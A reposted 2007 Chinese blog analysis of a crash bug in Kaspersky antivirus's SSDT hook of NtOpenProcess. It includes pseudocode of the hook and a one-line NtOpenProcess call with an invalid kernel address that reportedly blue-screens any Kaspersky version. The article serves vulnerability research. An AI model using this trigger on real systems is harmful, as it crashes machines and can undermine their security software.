卡巴SSDT HOOK蓝屏漏洞分析

苍崎青子

文章转自AYANAMI REI的自由之地http://hi.baidu.com/ayarei/blog/category/%BC%BC%CA%F5%B9%E9%B5%B5
文章：http://hi.baidu.com/ayarei/blog/item/0c2b7dd0482f7b8ea0ec9c5f.html
全文如下：
卡巴SSDT HOOK蓝屏漏洞分析
2007年06月09日 星期六 上午 00:43

MJ0011的文章，发在Debugman论坛上。 参考rootkit.com上EP_X0FF的相关文章(EP_X0FF的文章可是指的6.0-7.0的通杀) 卡巴6.2.10.233及之前的版本MyNtOpenProcess大概是这样写的: __try { if (ClientId->UniqueProcess == KasperskyProcesss) return STATUS_ACCESS_DENIED; else return OldNtOpenProcess(ProcessHandle, DesiredAccess, ObjectAttributes, ClientId); __except (EXCEPTION_EXECUTE_HANDLER) { ...... 后来，在新版本（我这里得到的是6.2.10.261)里MyNtOpenProcess大概是这样写的: __try { TestPointer(ClientId,8,0,1); if (ClientId->UniqueProcess == KasperskyProcesss) return STATUS_ACCESS_DENIED; else return OldNtOpenProcess(ProcessHandle, DesiredAccess, ObjectAttributes, ClientId); __except (EXCEPTION_EXECUTE_HANDLER) { ...... 其中TestPointer函数会使用SEH，然后读取ClientID所在页，是否引发异常 以检测该地址是否有效 很明显，这些方法都无法防止访问无效的内核地址所引发的PAGE_FAULT 使用NtOpenProcess(&Handle,PROCESS_QUERY_INFORMATION,&oba,0x87654321) 即可使任意版本的卡巴斯基蓝屏 附相关文章： http://www.rootkit.com/newsread.php?newsid=726